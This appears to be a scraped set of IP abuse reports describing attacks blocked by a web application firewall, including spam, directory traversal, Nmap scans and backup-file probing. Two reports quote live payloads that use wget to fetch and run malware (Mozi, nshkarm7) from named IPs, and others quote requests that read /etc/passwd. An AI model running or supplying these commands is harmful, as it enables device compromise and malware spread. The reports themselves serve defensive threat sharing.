Because this IP is getting blacklisted, legitimate emails to us from Nanobanc sending through that s ...
show moreBecause this IP is getting blacklisted, legitimate emails to us from Nanobanc sending through that server are being rejected due to the spam score :(
show less
Sending spam emails saying to download photos from this domain http://txsdue.dyoobomyf.com/redactedI ...
show moreSending spam emails saying to download photos from this domain http://txsdue.dyoobomyf.com/redactedID
show less
Observed repeated directory traversal attempts targeting /etc/passwd using multiple URL-encoded path ...
show moreObserved repeated directory traversal attempts targeting /etc/passwd using multiple URL-encoded path variants. Activity appears automated and consistent with web application exploitation scanning. Requests were blocked by AWS WAF (AWSManagedRulesCommonRuleSet) over 80,000 times yesterday.
show less
Blocked by AWS WAF. IP attempted Local File Inclusion (LFI) via query string:
GET /images/styles.ph ...
show moreBlocked by AWS WAF. IP attempted Local File Inclusion (LFI) via query string:
GET /images/styles.php?toroot=/etc/passwd%00
Matched AWSManagedRulesLinuxRuleSet โ LFI_QUERYSTRING.
Clear attempt to read /etc/passwd on a Linux host.
show less
Blocked GET request to /setup.cgi with query parameters designed for command injection (rm -rf /tmp/ ...
show moreBlocked GET request to /setup.cgi with query parameters designed for command injection (rm -rf /tmp/*; wget http://177.163.253.32:58348/Mozi.m -O /tmp/netgear; sh netgear). The URL parameters (including netgear.cfg) suggest an attempt to compromise a Netgear or similar IoT device. The attack appears to be part of an automated web application attack/hacking attempt targeting IoT vulnerabilities, and was blocked by AWS WAF using managed rules.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. ...
show moreBlocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.
show less
The IP 223.158.137.224 attempted to access a restricted backup file (`joomla.bak`), which is a **com ...
show moreThe IP 223.158.137.224 attempted to access a restricted backup file (`joomla.bak`), which is a **common reconnaissance technique** used to locate exposed Joomla CMS configuration backups.
The request was **blocked by AWS WAF** under the **"RestrictedExtensions_URIPATH"** rule, confirming it as a **malicious scan**. The IP was also rate-limited, suggesting it is engaging in automated probing.
This activity is **consistent with hacking attempts** looking for misconfigured servers with exposed backups.
show less
This IP (185.121.15.223) is actively hosting **malicious scripts** used in Remote File Inclusion (RF ...
show moreThis IP (185.121.15.223) is actively hosting **malicious scripts** used in Remote File Inclusion (RFI) attacks. Attackers are sending payloads that download and execute files from this IP, such as:
cmd=cd /tmp; rm nshkarm7; wget http://185.121.15.223/nshkarm7; chmod 777 *; ./nshkarm7 tbk
This indicates that the server at this IP is being used for **malware distribution**, likely to install backdoors or other harmful software on targeted systems. The activity was detected and blocked by AWS WAF under the **GenericRFI_QUERYARGUMENTS** rule. This IP should be blacklisted to prevent further abuse.
show less
The IP has been blocked multiple times by AWS WAF for attempting Local File Inclusion (LFI) attacks. ...
show moreThe IP has been blocked multiple times by AWS WAF for attempting Local File Inclusion (LFI) attacks. The requests targeted various paths using directory traversal techniques, such as:
- `/img../.git/config`
- `/js../.git/config`
- `/static../.git/config`
- `/events../.git/config`
- `/css../.git/config`
- `/assets../.git/config`
- `/images../.git/config`
- `/content../.git/config`
- `/media../.git/config`
These requests indicate an attempt to exploit misconfigured servers to access `.git/config` files, which can contain sensitive repository metadata. The activity was blocked under the AWS WAF Managed Core Rule Set (`GenericLFI_URIPATH`).
This behavior is consistent with automated scanning for vulnerable directories and is considered malicious.
show less
This IP has been flagged by AWS WAF for multiple attempts to perform Local File Inclusion (LFI) atta ...
show moreThis IP has been flagged by AWS WAF for multiple attempts to perform Local File Inclusion (LFI) attacks. The requests specifically targeted paths like `/lib../.git/config`, `/images../.git/config`, and `/media../.git/config`. These attempts were blocked under the AWS WAF Managed Core Rule Set for LFI URI Path. The malicious actor is likely trying to access sensitive configuration files using directory traversal techniques. These repeated requests originated from different user agents, indicating possible automation or a malicious bot.
show less
This IP has been flagged by AWS WAF for multiple attempts to perform Local File Inclusion (LFI) atta ...
show moreThis IP has been flagged by AWS WAF for multiple attempts to perform Local File Inclusion (LFI) attacks. The requests specifically targeted paths like `/lib../.git/config`, `/images../.git/config`, and `/media../.git/config`. These attempts were blocked under the AWS WAF Managed Core Rule Set for LFI URI Path. The malicious actor is likely trying to access sensitive configuration files using directory traversal techniques. These repeated requests originated from different user agents, indicating possible automation or a malicious bot.
show less